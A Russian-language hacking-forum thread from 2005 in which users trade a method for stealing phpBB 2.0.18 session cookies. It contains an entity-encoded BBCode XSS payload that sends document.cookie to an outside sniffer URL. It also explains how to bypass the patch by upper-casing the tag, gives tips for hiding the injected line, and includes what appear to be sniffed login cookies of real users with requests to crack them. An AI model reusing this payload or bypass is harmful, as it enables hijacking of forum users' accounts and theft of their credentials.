Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Куки в phpbb 2.0.17 - 2.0.18 (https://forum.antichat.xyz/showthread.php?t=10757)

Manoz 14.11.2005 02:50
Куки в phpbb 2.0.17 - 2.0.18
 
Отснифал кукисы, могу зайти под юзером, но есть ли возможность расшифровать пароль?

a:2:{s:11:"autologinid";s:33:"15947019324377939477 62e4.02269531";s:6:"userid";i:1161;}

1594701932437793947762e4.02269531 - Это какой алгоритм шифрования, :confused: :confused:

Спасибо за помощь! ;)

Otaku 14.11.2005 07:15
Может это поможет?
http://www.webmastertools.narod.ru/O...rl_decode.html

Tikson 14.11.2005 11:14
спасибо мне тоже это надо было =)

Tem 14.11.2005 14:25
Да если не трудно, поставь весь код.

Polisos 14.11.2005 15:20
Цитата:
Сообщение от <<YaYaYa>>
Короче добрые люди! (Полисос, тебя не спрашиваю)
Помогите! Как провести XSS-атаку на форум phpbb 2.0.18??????
Используй поиск античата.

Tem 14.11.2005 15:23
Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?

Polisos 14.11.2005 15:25
Цитата:
Сообщение от Tem
Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
Ну давай. Теги вообще на форуме работают та? Я и сам уберал, там всё работает значит ты что то не даубрал. Покажи что и как делаешь.

Polisos 14.11.2005 15:54
Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&#58&#117&#114&#108&#40&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#105&#109&#97&#103&#101&#115&#91&#49&#93&#46&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#34+document.cookie;&#41&#32]wj[/url][/url]
Ну так поможет? Подставь ; знак чтобы закрыть символ.

А вообще, преведи результат кода который ты постишь.

Я просто уже не знаю как его тут запостить, уже ведь и видео снял...и статью написал! :rolleyes:

Что ещё нужно?

Может народовский сайт создать а там в тексте мх

Tem 14.11.2005 15:57
Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
Я убераю все плюсики, но всё равно не пашет.

Polisos 14.11.2005 15:58
в html теги засунь.

Нет, результат в html засунь Я ведь не вижу если просто запостишь они просто на форуме сработают!

Покажи результат что ты делаешь, и засунь это всё так же в теги на античатовском форуме.

Работает только в ИЕ не забывай этого.

Polisos 14.11.2005 17:00
Цитата:
Сообщение от <<YaYaYa>>
спасибо за такой хороший разказ, но вопрос про то как расшифровать ещё открыт! как?????????????
Ну как как. Я те ссылку дал. Надо ; в конец специальных символов подставить.

И да всегда пожалуйста.

Polisos 15.11.2005 02:12
Цитата:
Сообщение от <<YaYaYa>>
Полисос! Тот код, что ты дал не работает!
Приведи результат который ты получаешь на форуме.

syntacsis 18.11.2005 17:20
Цитата:
Сообщение от Tem
Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
Преобразование идет из-за заплатки. Она стоит почти на всех 2.0.18 Но если код слегка подправить, он отлично работает. Заплатка отдыхает. Я подправил, у меня заработал код алерта на 2.0.18 и второй код пашет вроде.
Но у меня ламерский вопрос, на который очень прошу кого-нибудь ответить. Как при помощи этого кода воровать куки? Можно пошагово? Куда они прописываются? В этом коде надо что-то менять? Как взять куки конкретного юзера? (Я говорю о коде для phpbb 2.0.18 которые выше Polisos дал).

syntacsis 18.11.2005 17:43
<<YaYaYa>> , Я еще раз говорю, я не знаю как отснифать куки поэтому и прошу это подробно объяснить.
У меня работает код алерта (исправленный). У тебя этот код работает? Что выдает форум?

syntacsis 18.11.2005 18:27
Цитата:
Сообщение от <<YaYaYa>>
Ты не можешь мне в личку или тут выложить этот код? и как ты понял, что код работает, если ьы даже не знаешь как куки отснифать...
напиши код, а я те скажу потом как его сделать под античатовский сниффер
ну лови в личку... просто все говорят, что и код алерта не работает, а он может работать. наверно, если код воровки исправить по тому же принципу, то и он заработает? (я предполагаю)

syntacsis 18.11.2005 18:43
Куда ставить код? Как получить куки конкретного юзера? Где они пропишутся?
Как сам процесс идет, если код известен?

FQziT 18.11.2005 19:15
вот один из множества доступных снифферов. http://antichat.ru/sniff/
там всё написано....

syntacsis 18.11.2005 19:20
<<YaYaYa>> , ты проверил с изменениями, которые я тебе в личку кинул? Работает?
Спасибо, кстати, за объяснение. Вроде бы понял... Если что, еще спрошу.

syntacsis 20.11.2005 01:22
Кстати небольшой совет: для дополнительной страховки задавайте строчке скрипта размер 1. Тогда ваши возможные косяки во многих случаях пройдут незамеченными

syntacsis 21.11.2005 05:18
Цитата:
Сообщение от Бафун
...тебе сняли видео...
этого видео, как я понял на античате больше нет. :(
огромная просьба, если оно где-то есть, поделиться.
pls...

Бафун 22.11.2005 00:36
Его кажись уже нету. Попроси Администрацию, она выложит его на раздел http://video.antichat.ru/

syntacsis 23.11.2005 01:38
Цитата:
Сообщение от Tem
...форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил...
Это заплатка. Обойти ее можно, если в коде "url" заменить везде на "URL". Просто регистр.

Цитата:
Сообщение от Manoz
Отснифал кукисы, могу зайти под юзером, но есть ли возможность расшифровать пароль?

a:2:{s:11:"autologinid";s:33:"15947019324377939477 62e4.02269531";s:6:"userid";i:1161;}

1594701932437793947762e4.02269531 - Это какой алгоритм шифрования, :confused: :confused:
Та же проблема. Декодер не помогает.
ПОМОГИТЕ pls, если кто может:

QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:3 3:"15539923884383294c4ad690.68000462";s:6:"userid" ;i:282;}; phpbb2mysql_sid=5bf8841fc40848e12f7f8c828e2287ed; hotlog=1; phpbb2mysql_t=a:1:{i:2744;i:1132669277;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"926 2666414382ed705416c8.04124515";s:6:"userid";i:282; }

Как расшифровать?

syntacsis 23.11.2005 15:02
С 18й версии в куках нет хэша. Вместо него пустота или примерно такое число 15539923884383294c4ad690.68000462
Совсем по другому обрабатываются сессии. Оч. интересно... Но не понятно.
Добавлено qBiN'ом:
Непонятно? Погляди в исходник! =)

podkashey 20.01.2006 00:42
Так че с такими куками делать? Расшифровать нельзя вроде, т е пароль уже не узнать?
Кстати, куки с пустым хэшем (хотя и был автологин) приходили с форума одного, хотя с него же приходили и нормальные. Это как так может получиться?

S_T 25.01.2006 14:21
Да вообше странная вешь с куками под пхп бб у меня приходило по 2 сида

Grrl 26.01.2006 03:07
вот тут http://debug-mode.in/phpbb.txt статья по теме,думаю интересующимися проблемами куков в новых версиях phpBB будет интересна .


Время: 04:15